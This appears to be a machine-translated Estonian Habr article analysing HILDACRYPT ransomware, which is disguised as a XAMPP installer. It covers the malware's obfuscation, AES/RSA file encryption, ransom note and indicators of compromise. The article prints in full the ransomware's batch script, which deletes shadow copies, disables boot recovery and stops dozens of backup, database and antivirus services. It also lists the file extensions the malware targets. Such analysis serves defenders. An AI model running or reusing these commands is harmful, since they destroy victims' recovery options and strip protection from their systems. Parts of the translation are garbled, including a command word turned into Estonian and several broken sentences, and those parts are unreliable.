Tere, Habr! Taaskord räägime Ransomware kategooriasse kuuluva pahavara uusimatest versioonidest. HILDACRYPT on uus lunavara, 2019. aasta augustis avastatud Hilda perekonna liige, mis sai nime tarkvara levitamiseks kasutatud Netflixi koomiksi järgi. Täna tutvume selle uuendatud lunavaraviiruse tehniliste omadustega.
Hilda lunavara esimeses versioonis on Youtube'i postitatud link ühele koomiksisari sisaldas lunaraha. HILDACRYPT maskeeritakse seadusliku XAMPP-installijana, hõlpsasti installitava Apache'i distributsioonina, mis sisaldab MariaDB-d, PHP-d ja Perli. Samal ajal on krüptoblokaatoril erinev failinimi - xamp. Lisaks puudub lunavarafailil elektrooniline allkiri.
Staatiline analüüs
Lunavara sisaldub MS Windowsi jaoks kirjutatud PE32 .NET failis. Selle suurus on 135 168 baiti. Nii põhiprogrammi kood kui ka kaitsva programmi kood on kirjutatud C# keeles. Koostamise kuupäeva ja ajatempli järgi loodi binaar 14. septembril 2019. aastal.
Detect It Easy andmetel arhiveeritakse lunavara Confuseri ja ConfuserExi abil, kuid need obfuskaatorid on samad, mis varem, ainult ConfuserEx on Confuseri järglane, seega on nende koodiallkirjad sarnased.
HILDACRYPT on tõepoolest pakitud koos ConfuserExiga.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Rünnaku vektor
Tõenäoliselt avastati lunavara ühelt veebiprogrammide saidilt, maskeerides end seadusliku XAMPP-programmina.
Kogu nakkusahel on näha .
Hägusus
Lunavara stringid salvestatakse krüpteeritud kujul. Käivitamisel dekrüpteerib HILDACRYPT need Base64 ja AES-256-CBC abil.
Paigaldamine
Esiteks loob lunavara rakenduses %AppDataRoaming% kausta, milles genereeritakse juhuslikult GUID (Globally Unique Identifier) parameeter. Lisades sellesse asukohta nahkhiirefaili, käivitab lunavaraviirus selle cmd.exe abil:
cmd.exe /c JKfgkgj3hjgfhjka.bat & välju
Seejärel alustab see pakkskripti käivitamist, et keelata süsteemi funktsioonid või teenused.
Skript sisaldab pikka nimekirja käskudest, mis hävitavad varikoopiad, keelavad SQL-serveri, varundus- ja viirusetõrjelahendused.
Näiteks proovib see ebaõnnestunult peatada Acronise varundusteenuseid. Lisaks ründab see järgmiste tarnijate varusüsteeme ja viirusetõrjelahendusi: Veeam, Sophos, Kaspersky, McAfee jt.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Kui ülalmainitud teenused ja protsessid on keelatud, kogub krüptolukk käsku Tasklist käsku kasutades teavet kõigi töötavate protsesside kohta, et tagada kõigi vajalike teenuste töötamine.
ülesannete loend v/fo csv
See käsk kuvab üksikasjaliku loendi töötavatest protsessidest, mille elemendid on eraldatud märgiga ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Pärast seda kontrolli alustab lunavara krüpteerimisprotsessi.
Krüpteerimine
Failide krüpteerimine
HILDACRYPT läbib kogu kõvaketaste leitud sisu, välja arvatud kaustad Recycle.Bin ja Reference AssembliesMicrosoft. Viimane sisaldab .Neti rakenduste jaoks olulisi dll-, pdb- jne faile, mis võivad lunavara tööd mõjutada. Krüpteeritavate failide otsimiseks kasutatakse järgmist laiendite loendit:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Lunavara kasutab kasutaja failide krüptimiseks AES-256-CBC algoritmi. Võtme suurus on 256 bitti ja initsialiseerimisvektori (IV) suurus on 16 baiti.
Järgmisel ekraanipildil saadi bait_2 ja bait_1 väärtused juhuslikult, kasutades GetBytes().
võti
IN JA
Krüpteeritud failil on laiend HCY!.. See on näide krüptitud failist. Selle faili jaoks loodi ülalmainitud võti ja IV.
Võtme krüpteerimine
Krüptolukk salvestab loodud AES-võtme krüptitud faili. Krüptitud faili esimesel osal on päis, mis sisaldab selliseid andmeid nagu HILDACRYPT, KEY, IV, FileLen XML-vormingus ja näeb välja järgmine:
AES- ja IV-võtme krüpteerimine toimub RSA-2048 abil ja kodeerimine Base64 abil. RSA avalik võti salvestatakse krüptolukusti kehasse ühes XML-vormingus krüptitud stringis.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES-failivõtme krüptimiseks kasutatakse RSA avalikku võtit. RSA avalik võti on Base64 kodeeritud ja koosneb moodulist ja avalikust eksponendist 65537. Dekrüpteerimiseks on vaja RSA privaatvõtit, mis ründajal on.
Pärast RSA krüptimist kodeeritakse AES-võti krüptitud faili salvestatud Base64 abil.
Lunaraha sõnum
Kui krüptimine on lõppenud, kirjutab HILDACRYPT html-faili kausta, kuhu ta failid krüpteeris. Lunavarateade sisaldab kahte meiliaadressi, kus ohver saab ründajaga ühendust võtta.
Väljapressimisteates on ka rida “No loli is safe;)” – viide Jaapanis keelatud väikeste tüdrukute välimusega anime- ja mangategelastele.
Väljund
Uus lunavaraperekond HILDACRYPT on välja andnud uue versiooni. Krüpteerimismudel takistab ohvril lunavara krüpteeritud failide dekrüpteerimist. Cryptolocker kasutab varusüsteemide ja viirusetõrjelahendustega seotud kaitseteenuste keelamiseks aktiivseid kaitsemeetodeid. HILDACRYPTi autor on Netflixis näidatud animasarja Hilda fänn, mille treileri link sisaldus programmi eelmise versiooni väljaostukirjas.
Nagu tavaliselt, и saab kaitsta teie arvutit HILDACRYPT lunavara eest ja pakkujatel on võimalus kaitsta oma kliente . Kaitse tagab see, et need lahendused sisaldavad sisaldab mitte ainult varundamist, vaid ka meie integreeritud turvasüsteemi - Toetab masinõppemudelit ja põhineb käitumuslikul heuristikal – tehnoloogial, mis suudab nullpäeva lunavara ohu vastu võidelda nagu ükski teine.
Kompromissi näitajad
Faililaiend HCY!
HILDACRYPTReadMe.html
xamp.exe ühe tähega "p" ja ilma digiallkirjata
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Allikas: www.habr.com